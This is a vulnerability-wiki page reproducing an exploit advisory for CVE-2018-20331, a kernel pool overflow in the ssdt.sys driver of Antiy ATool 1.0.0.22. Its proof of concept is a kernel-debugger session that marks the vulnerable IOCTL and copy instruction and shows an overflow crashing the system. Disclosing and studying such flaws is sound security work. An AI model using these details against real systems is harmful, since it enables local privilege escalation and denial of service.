Loading
0

CVE-2018-20331 ATool 1.0.0.22缓冲区溢出漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

EXP

# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day)
# CVE: CVE-2018-20331
# Date: 21-12-2018
# Software Link: http://www.antiy.net/ <http://www.antiy.net/> 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>
# Vendor Homepage: http://www.antiy.net/ <http://www.antiy.net/> 
# Category: Windows
# Attack Type: local
# Impact:Code execution/Denial of Service/Escalation of Privileges

 
1. Description

> Local attackers can trigger a Kernel Pool Buffer Overflow in
> Antiy AVL ATool
> v1.0.0.22. An attacker must first obtain the ability to execute
> low-privileged code on the target system in order to exploit this
> vulnerability. The specific flaw exists within the processing of IOCTL
> 0x80002004 by the ssdt.sys kernel driver. The bug is
> caused by failure to properly validate the length of the user-supplied
> data. An attacker can
> leverage this vulnerability to execute arbitrary code in the context
> of the kernel, which could lead to privilege escalation. A failed
> exploit could lead to denial of service.


   
2. Proof of Concept
 

0: kd> !drvobj ssdt 2
Driver object (87fe0f38) is for:
 \Driver\ssdt
DriverEntry:   aaa0b99e	ssdt
DriverStartIo: 00000000	
DriverUnload:  aaa0b828	ssdt
AddDevice:     00000000	

Dispatch routines:
00 IRP_MJ_CREATE                      aaa0b686	ssdt+0x686
01 IRP_MJ_CREATE_NAMED_PIPE           82b08da3	nt!IopInvalidDeviceRequest
02 IRP_MJ_CLOSE                       aaa0b686	ssdt+0x686
03 IRP_MJ_READ                        82b08da3	nt!IopInvalidDeviceRequest
04 IRP_MJ_WRITE                       82b08da3	nt!IopInvalidDeviceRequest
05 IRP_MJ_QUERY_INFORMATION           82b08da3	nt!IopInvalidDeviceRequest
06 IRP_MJ_SET_INFORMATION             82b08da3	nt!IopInvalidDeviceRequest
07 IRP_MJ_QUERY_EA                    82b08da3	nt!IopInvalidDeviceRequest
08 IRP_MJ_SET_EA                      82b08da3	nt!IopInvalidDeviceRequest
09 IRP_MJ_FLUSH_BUFFERS               82b08da3	nt!IopInvalidDeviceRequest
0a IRP_MJ_QUERY_VOLUME_INFORMATION    82b08da3	nt!IopInvalidDeviceRequest
0b IRP_MJ_SET_VOLUME_INFORMATION      82b08da3	nt!IopInvalidDeviceRequest
0c IRP_MJ_DIRECTORY_CONTROL           82b08da3	nt!IopInvalidDeviceRequest
0d IRP_MJ_FILE_SYSTEM_CONTROL         82b08da3	nt!IopInvalidDeviceRequest
0e IRP_MJ_DEVICE_CONTROL              aaa0b6c8	ssdt+0x6c8 <======================= Dispatch Function
0f IRP_MJ_INTERNAL_DEVICE_CONTROL     82b08da3	nt!IopInvalidDeviceRequest
10 IRP_MJ_SHUTDOWN                    82b08da3	nt!IopInvalidDeviceRequest
11 IRP_MJ_LOCK_CONTROL                82b08da3	nt!IopInvalidDeviceRequest
12 IRP_MJ_CLEANUP                     82b08da3	nt!IopInvalidDeviceRequest
13 IRP_MJ_CREATE_MAILSLOT             82b08da3	nt!IopInvalidDeviceRequest
14 IRP_MJ_QUERY_SECURITY              82b08da3	nt!IopInvalidDeviceRequest
15 IRP_MJ_SET_SECURITY                82b08da3	nt!IopInvalidDeviceRequest
16 IRP_MJ_POWER                       82b08da3	nt!IopInvalidDeviceRequest
17 IRP_MJ_SYSTEM_CONTROL              82b08da3	nt!IopInvalidDeviceRequest
18 IRP_MJ_DEVICE_CHANGE               82b08da3	nt!IopInvalidDeviceRequest
19 IRP_MJ_QUERY_QUOTA                 82b08da3	nt!IopInvalidDeviceRequest
1a IRP_MJ_SET_QUOTA                   82b08da3	nt!IopInvalidDeviceRequest
1b IRP_MJ_PNP                         82b08da3	nt!IopInvalidDeviceRequest

0: kd> bp aaa0b6c8
0: kd> g
Breakpoint 0 hit
ssdt+0x6c8:
aaa0b6c8 8bff            mov     edi,edi
0: kd> dd edi
87d6d238  00800005 86c620c8 00000000 00000000
87d6d248  00000000 00000000 00000000 00000000
87d6d258  00000000 00000000 00000000 00040002
87d6d268  00000000 00000000 00000000 00000000
87d6d278  00000000 00000001 00000000 00040001
87d6d288  00000000 87d6d28c 87d6d28c 00040000
87d6d298  00000000 87d6d29c 87d6d29c 00000000
87d6d2a8  00000000 87d6d2ac 87d6d2ac 00000000
0: kd> u eip L20
ssdt+0x6c8:
aaa0b6c8 8bff            mov     edi,edi
aaa0b6ca 55              push    ebp
aaa0b6cb 8bec            mov     ebp,esp
aaa0b6cd 83ec0c          sub     esp,0Ch
aaa0b6d0 53              push    ebx
aaa0b6d1 8b5d0c          mov     ebx,dword ptr ebp+0Ch
aaa0b6d4 8b4360          mov     eax,dword ptr ebx+60h
aaa0b6d7 56              push    esi
aaa0b6d8 33f6            xor     esi,esi
aaa0b6da 89731c          mov     dword ptr ebx+1Ch,esi
aaa0b6dd 8b5004          mov     edx,dword ptr eax+4
aaa0b6e0 8b4808          mov     ecx,dword ptr eax+8
aaa0b6e3 8b400c          mov     eax,dword ptr eax+0Ch
aaa0b6e6 3d00200080      cmp     eax,80002000h
aaa0b6eb 57              push    edi
aaa0b6ec 8b7b0c          mov     edi,dword ptr ebx+0Ch
aaa0b6ef 8955fc          mov     dword ptr ebp-4,edx
aaa0b6f2 0f84d7000000    je      ssdt+0x7cf (aaa0b7cf)
aaa0b6f8 3d04200080      cmp     eax,80002004h <======================== Vulnerable IOCTL
aaa0b6fd 7442            je      ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080      cmp     eax,80002008h
aaa0b704 7531            jne     ssdt+0x737 (aaa0b737)
aaa0b706 8b37            mov     esi,dword ptr edi
aaa0b708 56              push    esi
aaa0b709 68a4b6a0aa      push    offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff      call    ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa      mov     eax,dword ptr ssdt+0x50c (aaa0b50c)
aaa0b718 3b7008          cmp     esi,dword ptr eax+8
aaa0b71b 59              pop     ecx
aaa0b71c 59              pop     ecx
aaa0b71d 7714            ja      ssdt+0x733 (aaa0b733)
aaa0b71f 8b00            mov     eax,dword ptr eax
0: kd> u . L40
ssdt+0x6f8:
aaa0b6f8 3d04200080      cmp     eax,80002004h
aaa0b6fd 7442            je      ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080      cmp     eax,80002008h
aaa0b704 7531            jne     ssdt+0x737 (aaa0b737)
aaa0b706 8b37            mov     esi,dword ptr edi
aaa0b708 56              push    esi
aaa0b709 68a4b6a0aa      push    offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff      call    ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa      mov     eax,dword ptr ssdt+0x50c (aaa0b50c)
aaa0b718 3b7008          cmp     esi,dword ptr eax+8
aaa0b71b 59              pop     ecx
aaa0b71c 59              pop     ecx
aaa0b71d 7714            ja      ssdt+0x733 (aaa0b733)
aaa0b71f 8b00            mov     eax,dword ptr eax
aaa0b721 8b04b0          mov     eax,dword ptr eax+esi*4
aaa0b724 8907            mov     dword ptr edi,eax
aaa0b726 8b45fc          mov     eax,dword ptr ebp-4
aaa0b729 89431c          mov     dword ptr ebx+1Ch,eax
aaa0b72c 33f6            xor     esi,esi
aaa0b72e e9ad000000      jmp     ssdt+0x7e0 (aaa0b7e0)
aaa0b733 83631c00        and     dword ptr ebx+1Ch,0
aaa0b737 be0d0000c0      mov     esi,0C000000Dh
aaa0b73c e99f000000      jmp     ssdt+0x7e0 (aaa0b7e0)
aaa0b741 6844646b20      push    206B6444h     <======================= Pooltag
aaa0b746 c1e902          shr     ecx,2
aaa0b749 52              push    edx
aaa0b74a 8bf1            mov     esi,ecx
aaa0b74c 6a00            push    0        <==================================Pool type
aaa0b74e 

1: kd> u . L20
ssdt+0x782:
aaa0b782 8911            mov     dword ptr ecx,edx
aaa0b784 83c104          add     ecx,4
aaa0b787 ff4df8          dec     dword ptr ebp-8
aaa0b78a 75e5            jne     ssdt+0x771 (aaa0b771)
aaa0b78c 8b75f4          mov     esi,dword ptr ebp-0Ch
aaa0b78f 8b0d0cb5a0aa    mov     ecx,dword ptr ssdt+0x50c (aaa0b50c)
aaa0b795 3b7108          cmp     esi,dword ptr ecx+8
aaa0b798 7316            jae     ssdt+0x7b0 (aaa0b7b0)
aaa0b79a 8bd6            mov     edx,esi
aaa0b79c 8b09            mov     ecx,dword ptr ecx
aaa0b79e 8b0c91          mov     ecx,dword ptr ecx+edx*4
aaa0b7a1 890c90          mov     dword ptr eax+edx*4,ecx
aaa0b7a4 8b0d0cb5a0aa    mov     ecx,dword ptr ssdt+0x50c (aaa0b50c)
aaa0b7aa 42              inc     edx
aaa0b7ab 3b5108          cmp     edx,dword ptr ecx+8
aaa0b7ae 72ec            jb      ssdt+0x79c (aaa0b79c)
aaa0b7b0 8b4dfc          mov     ecx,dword ptr ebp-4
aaa0b7b3 8bd1            mov     edx,ecx
aaa0b7b5 c1e902          shr     ecx,2
aaa0b7b8 8bf0            mov     esi,eax
aaa0b7ba f3a5            rep movs dword ptr es:edi,dword ptr esi
aaa0b7bc 8bca            mov     ecx,edx
aaa0b7be 83e103          and     ecx,3
aaa0b7c1 50              push    eax
aaa0b7c2 f3a4            rep movs byte ptr es:edi,byte ptr esi <======================= Vulnerable copy

1: kd> dc edi
85a6ce00  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA    <================ Evil user input 
85a6ce10  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce20  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce30  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce40  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce50  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
1: kd> g

*** Fatal System Error: 0x00000019
                       (0x00000020,0x892CF250,0x892CF260,0x08020012)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

1: kd> !analyze -v

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************


BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 892cf250, The pool entry we were looking for within the page.
Arg3: 892cf260, The next pool entry.
Arg4: 08020012, (reserved






3. Solution:
   
None


免费、自由、人人(PwnWiki.Com)可编辑的漏洞库